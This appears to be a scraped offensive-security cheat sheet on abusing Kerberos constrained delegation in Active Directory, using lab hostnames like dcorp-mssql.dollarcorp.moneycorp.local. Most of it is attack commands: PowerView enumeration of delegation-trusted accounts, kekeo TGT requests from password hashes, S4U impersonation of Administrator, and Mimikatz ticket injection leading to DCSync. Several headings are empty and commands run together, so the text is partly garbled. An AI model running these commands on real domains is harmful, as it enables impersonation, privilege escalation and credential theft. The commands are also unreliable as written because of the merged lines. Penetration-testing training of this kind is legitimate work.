π’Constrained Delegation
Dive into our comprehensive article exploring the intricacies of Constrained Delegation. Uncover its functions, role, and understanding its impact for an effective system management strategy.
Get-DomainUser -TrustedToAuth
Get-DomainUser -TrustedToAuth | select samaccountname, msds-allowedtodelegatetoGet-Domaincomputer -TrustedToAuth
Get-Domaincomputer -TrustedToAuth | select samaccountname, msds-allowedtodelegatetoConstrained delegation User
./kekeo.exe
Tgt::ask /user:<username> /domain:<domain> /rc4:<hash>Tgs::s4u /tgt:<tgt> /user:Administrator@<domain> /service:cifs/dcorp-mssql.dollarcorp.moneycorp.localInvoke-Mimikatz -Command '"kerberos::ptt <kirbi file>"'Constrained delegation Computer
./kekeo.exe
Tgt::ask /user:dcorp-adminsrv$ /domain:<domain> /rc4:<hash>Using mimikatz to inject TGS ticket and executing DCsync
Additional Enumeration Techniques
Further Exploitation
Cleaning Up
Additional Resources
Last updated